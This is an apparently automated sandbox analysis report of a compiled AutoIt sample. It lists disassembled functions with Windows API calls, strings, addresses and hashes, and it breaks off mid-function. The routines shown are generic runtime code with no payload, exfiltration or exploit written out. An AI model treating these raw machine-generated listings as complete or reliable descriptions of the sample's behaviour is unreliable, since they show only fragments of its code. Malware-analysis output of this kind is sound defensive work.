CharLowerBuffW.USER32(?,?), ref: 004AA3CB
GetDriveTypeW.KERNEL32 ref: 004AA418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004AA460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004AA497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004AA4C5

Part of subcall function 00447BCC: _memmove.LIBCMT ref: 00447C06

Strings

close, xrefs: 004AA3D1
closed, xrefs: 004AA3DF, 004AA3E8
set cd door , xrefs: 004AA466
wait, xrefs: 004AA482
type cdaudio alias cd wait, xrefs: 004AA443
open, xrefs: 004AA3F2
open , xrefs: 004AA427
close cd wait, xrefs: 004AA4B0

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: c37efa638a0ad1e97e42f623764c6411027d207385eeb1b0d9a8a326b1102fd3
Instruction ID: a4ce0ef8fcbea5769a987c5736600dcf95cb7ed5f5ad90c2ede98dde7332d005
Opcode Fuzzy Hash: c37efa638a0ad1e97e42f623764c6411027d207385eeb1b0d9a8a326b1102fd3
Instruction Fuzzy Hash: AD518D711043049FD700EF21C881D6BB7E4EF99718F10886EF89657261DB39ED0ACB4A

Function 0049F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0047E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0049F8DF
LoadStringW.USER32(00000000,?,0047E029,00000001), ref: 0049F8E8

Part of subcall function 00447DE1: _memmove.LIBCMT ref: 00447E22

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0047E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0049F90A
LoadStringW.USER32(00000000,?,0047E029,00000001), ref: 0049F90D
__swprintf.LIBCMT ref: 0049F95D
__swprintf.LIBCMT ref: 0049F96E
_wprintf.LIBCMT ref: 0049FA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0049FA2E

Strings

^ ERROR, xrefs: 0049F9C3
Error: , xrefs: 0049F9E5
%s (%d) : ==> %s: %s %s, xrefs: 0049FA12
Line %d (File "%s"):, xrefs: 0049F957
Line %d:, xrefs: 0049F968

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: c4e37a92b104df88913b301728869236daba75946391d5226c3076231be52c89
Instruction ID: 18b794074358d8415e5c77dbc22c270218df88228c531bd3d3b8017e4726af5b
Opcode Fuzzy Hash: c4e37a92b104df88913b301728869236daba75946391d5226c3076231be52c89
Instruction Fuzzy Hash: DE41217290410DAADF04FBE1DD86EEE7778AF14304F50006AB505B6092EB396F4ACB69

Function 004CBA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,004C9207,?,?), ref: 004CBA56
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,004C9207,?,?,00000000,?), ref: 004CBA6D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,004C9207,?,?,00000000,?), ref: 004CBA78
CloseHandle.KERNEL32(00000000,?,?,?,?,004C9207,?,?,00000000,?), ref: 004CBA85
GlobalLock.KERNEL32(00000000), ref: 004CBA8E
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,004C9207,?,?,00000000,?), ref: 004CBA9D
GlobalUnlock.KERNEL32(00000000), ref: 004CBAA6
CloseHandle.KERNEL32(00000000,?,?,?,?,004C9207,?,?,00000000,?), ref: 004CBAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,004C9207,?,?,00000000,?), ref: 004CBABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,004D2CAC,?), ref: 004CBAD7
GlobalFree.KERNEL32(00000000), ref: 004CBAE7
GetObjectW.GDI32(00000000,00000018,?), ref: 004CBB0B
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 004CBB36
DeleteObject.GDI32(00000000), ref: 004CBB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004CBB74

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 890364d83906924e26532a2ccc5e9e4677096f42096615a2d6166e80b276697a
Instruction ID: 7e23d48502a649fe28a619ad213d235d1a4385207626e8ea1fb6f8febc752390
Opcode Fuzzy Hash: 890364d83906924e26532a2ccc5e9e4677096f42096615a2d6166e80b276697a
Instruction Fuzzy Hash: 71417878600208FFCB519F65DC88EABBBB9FB89711F104069F905D7260D739AD05CB68

Function 004AD899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 004ADA10
_wcscat.LIBCMT ref: 004ADA28
_wcscat.LIBCMT ref: 004ADA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004ADA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 004ADA63
GetFileAttributesW.KERNEL32(?), ref: 004ADA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 004ADA95
SetCurrentDirectoryW.KERNEL32(?), ref: 004ADAA7

Strings

*.*, xrefs: 004ADAE6

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 7c5b7c8630dfee177df3d9fe733062f4ae7793005a2631d9a5ad012262227fc4
Instruction ID: 77df485ceb9bd5760fa528975ec4939974933d254afd38159b089121c73f600c
Opcode Fuzzy Hash: 7c5b7c8630dfee177df3d9fe733062f4ae7793005a2631d9a5ad012262227fc4
Instruction Fuzzy Hash: 9281A5B19042409FCB64EF65C8409AFB7E8AFAA314F14482FF88AC7651E638DD45CB56

Function 004CC1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00442612: GetWindowLongW.USER32(?,000000EB), ref: 00442623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 004CC1FC
GetFocus.USER32 ref: 004CC20C
GetDlgCtrlID.USER32(00000000), ref: 004CC217
_memset.LIBCMT ref: 004CC342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 004CC36D
GetMenuItemCount.USER32(?), ref: 004CC38D
GetMenuItemID.USER32(?,00000000), ref: 004CC3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 004CC3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 004CC41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004CC454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 004CC489

Strings

0, xrefs: 004CC33A

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 19535e8119178c1ff9b896398974a2062afdc6e5e2d25da7d3994efb73b52684
Instruction ID: f3906034ab71c75ddc22eeba2174902c448c1af3417e6753eed95b68e0d19a90
Opcode Fuzzy Hash: 19535e8119178c1ff9b896398974a2062afdc6e5e2d25da7d3994efb73b52684
Instruction Fuzzy Hash: 0681AC74608341AFD754CF14D894F6BBBE9FB88314F00892EF989972A1D738D905CB9A

Function 004B731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 004B738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 004B739B
CreateCompatibleDC.GDI32(?), ref: 004B73A7
SelectObject.GDI32(00000000,?), ref: 004B73B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 004B7408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 004B7444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 004B7468
SelectObject.GDI32(00000006,?), ref: 004B7470
DeleteObject.GDI32(?), ref: 004B7479
DeleteDC.GDI32(00000006), ref: 004B7480
ReleaseDC.USER32(00000000,?), ref: 004B748B

Strings

(, xrefs: 004B7410

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: e277192bf34808b88459d2d374cf37d66e700268ec73b72c6eaf841b55cfb74c
Instruction ID: e9ee3816644331bd05ca75f77eb6ae273009e6d14ea000ea1e66b914413e7eaf
Opcode Fuzzy Hash: e277192bf34808b88459d2d374cf37d66e700268ec73b72c6eaf841b55cfb74c
Instruction Fuzzy Hash: 2D513971904209EFCB14CFA9CC84EAFBBB9EF88710F14842EF99997211D735A945CB64

Function 00446A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00460957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00446B0C,?,00008000), ref: 00460973

Part of subcall function 00444750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00444743,?,?,004437AE,?), ref: 00444770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00446BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00446CFA

Part of subcall function 0044586D: _wcscpy.LIBCMT ref: 004458A5

Part of subcall function 0046363D: _iswctype.LIBCMT ref: 00463645

Strings

Unterminated string, xrefs: 0047E7E4
EA06, xrefs: 0047E452
>>>AUTOIT SCRIPT<<<, xrefs: 0047E496
Error opening the file, xrefs: 0047E43D, 0047E4B8
AU3!, xrefs: 00446B61
Bad directive syntax error, xrefs: 0047E79D
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0047E421

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 141171eb2795f5d8a5bf486cb37e31ef839a3ed54dc8d4af4337d4baac948965
Instruction ID: 1bcd8b9a326db43f0a4d8f1778114b8c41970cf63e8834d0c050ecf94996c3f0
Opcode Fuzzy Hash: 141171eb2795f5d8a5bf486cb37e31ef839a3ed54dc8d4af4337d4baac948965
Instruction Fuzzy Hash: D6028E705083409FDB14EF25C881AAFBBE5AF99318F10491FF48997262DB38D949CB5B

Function 004A2D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004A2D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 004A2DDD
GetMenuItemCount.USER32(00505890), ref: 004A2E66
DeleteMenu.USER32(00505890,00000005,00000000,000000F5,?,?), ref: 004A2EF6
DeleteMenu.USER32(00505890,00000004,00000000), ref: 004A2EFE
DeleteMenu.USER32(00505890,00000006,00000000), ref: 004A2F06
DeleteMenu.USER32(00505890,00000003,00000000), ref: 004A2F0E
GetMenuItemCount.USER32(00505890), ref: 004A2F16
SetMenuItemInfoW.USER32(00505890,00000004,00000000,00000030), ref: 004A2F4C
GetCursorPos.USER32(?), ref: 004A2F56
SetForegroundWindow.USER32(00000000), ref: 004A2F5F
TrackPopupMenuEx.USER32(00505890,00000000,?,00000000,00000000,00000000), ref: 004A2F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004A2F7E

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 9359b1266673b33b36de5dfda987d3c0f7661ea6292393b23a8ce3e507195b6d
Instruction ID: 18aa0319514f655ea728ba6006ff1e3e632b9cecc5ed213e601728462c1a055a
Opcode Fuzzy Hash: 9359b1266673b33b36de5dfda987d3c0f7661ea6292393b23a8ce3e507195b6d
Instruction Fuzzy Hash: 8271D270601205BEEB218F18DD45FABBF65FB26314F10022BF615AA2E1C7F95C50EB99

Function 004B88AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004B88D7
CoInitialize.OLE32(00000000), ref: 004B8904
CoUninitialize.OLE32 ref: 004B890E
GetRunningObjectTable.OLE32(00000000,?), ref: 004B8A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 004B8B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,004D2C0C), ref: 004B8B6F
CoGetObject.OLE32(?,00000000,004D2C0C,?), ref: 004B8B92
SetErrorMode.KERNEL32(00000000), ref: 004B8BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004B8C25
VariantClear.OLEAUT32(?), ref: 004B8C35

Strings

,,M, xrefs: 004B88C1

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID: ,,M
API String ID: 2395222682-4283052053
Opcode ID: b21846b8a93c844a14693b7e6b2dfe5798791ba7763d03b1d97492230321c7b7
Instruction ID: 185f370971640530e5c852277e27f671760eae3b62241df86a0e57ab598fbd5f
Opcode Fuzzy Hash: b21846b8a93c844a14693b7e6b2dfe5798791ba7763d03b1d97492230321c7b7
Instruction Fuzzy Hash: 4CC159B1208305AFD700DF25C88496BB7E9FF88748F00492EF5899B251DB75ED06CB66

Function 004977DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00447BCC: _memmove.LIBCMT ref: 00447C06

_memset.LIBCMT ref: 0049786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004978A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004978BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004978D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00497902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0049792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00497935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0049793A

Strings

SOFTWARE\Classes\, xrefs: 0049780C
\CLSID, xrefs: 00497822
\IPC$, xrefs: 00497882

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 0f35c4f274abb7c60f423c64145e415a063a7dddbfcc84693017474845867722
Instruction ID: 5886b17d9362c74c1292b30c6157ad7dde5874de2298c303b011204f3761da55
Opcode Fuzzy Hash: 0f35c4f274abb7c60f423c64145e415a063a7dddbfcc84693017474845867722
Instruction Fuzzy Hash: 2C410972C1422DABDF11EB95DC85DEEB778FF04714F00406AE905A3261DB385D09CB98

Function 004C0E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,004BFDAD,?,?), ref: 004C0E31

Strings

HKEY_USERS, xrefs: 004C0F32
HKLM, xrefs: 004C0EAF
HKEY_CURRENT_USER, xrefs: 004C0F10
HKCR, xrefs: 004C0ED9
HKU, xrefs: 004C0F43
HKEY_LOCAL_MACHINE, xrefs: 004C0E9A
HKEY_CLASSES_ROOT, xrefs: 004C0EC4
HKCU, xrefs: 004C0F21
HKCC, xrefs: 004C0EFF
HKEY_CURRENT_CONFIG, xrefs: 004C0EEE

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 4e5e6681186278e438d6eb6b0a871e4b119b7aca3dea64cdd69a393d72cb8072
Instruction ID: 050957c43eecd8fbcf14732c1d931efc40672fdcc75f06e88df74a32380e5f1d
Opcode Fuzzy Hash: 4e5e6681186278e438d6eb6b0a871e4b119b7aca3dea64cdd69a393d72cb8072
Instruction Fuzzy Hash: 0F41483510424A8BDF60EE51D851BEF3760AF21348F14441EFC951B2A2EB789D5ACB69

Function 0049F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0047E2A0,00000010,?,Bad directive syntax error,004CF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0049F7C2
LoadStringW.USER32(00000000,?,0047E2A0,00000010), ref: 0049F7C9

Part of subcall function 00447DE1: _memmove.LIBCMT ref: 00447E22

_wprintf.LIBCMT ref: 0049F7FC
__swprintf.LIBCMT ref: 0049F81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0049F88D

Strings

., xrefs: 0049F873
Line %d (File "%s"):, xrefs: 0049F833
%s (%d) : ==> %s.: %s %s, xrefs: 0049F7F7
Line %d:, xrefs: 0049F818
Error: , xrefs: 0049F85B

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: 1b30d212359678e5f5879ec824bd3d4aade871ade1bd88eb7a54228ec567895e
Instruction ID: 8e6ecaf5fbf4919301924e5fb82901214064a0cdc29c4a2743df50fab68f56ff
Opcode Fuzzy Hash: 1b30d212359678e5f5879ec824bd3d4aade871ade1bd88eb7a54228ec567895e
Instruction Fuzzy Hash: 52216D7290021EABDF11EF91CC4AFFE7739BF18304F04046BB505661A2EB39A619DB59

Function 004A52C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00447BCC: _memmove.LIBCMT ref: 00447C06

Part of subcall function 00447924: _memmove.LIBCMT ref: 004479AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 004A5330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 004A5346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004A5357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 004A5369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 004A537A

Strings

close PlayMe, xrefs: 004A5341, 004A536E
alias PlayMe, xrefs: 004A5309
status PlayMe mode, xrefs: 004A532B
open , xrefs: 004A52DF
play PlayMe wait, xrefs: 004A5364
play PlayMe, xrefs: 004A5375

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 07664290ff94441e730165edcfab30cee480dbbd6674245dfe5a4aeb4b12fc38
Instruction ID: 1877765edda191ef9244b2ba828b86bf6f6082780b47d7b9fd00ae5c8388933f
Opcode Fuzzy Hash: 07664290ff94441e730165edcfab30cee480dbbd6674245dfe5a4aeb4b12fc38
Instruction Fuzzy Hash: 2411866195015D79EB20F762CC49EFFBBBCEBE1B44F10042F7911960D1EEA81D05C6A8

Function 004A46B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 004A46D2
gethostname.WSOCK32(?,00000100), ref: 004A46EC
gethostbyname.WSOCK32(?), ref: 004A46F9
_wcscpy.LIBCMT ref: 004A4721
_memmove.LIBCMT ref: 004A4734
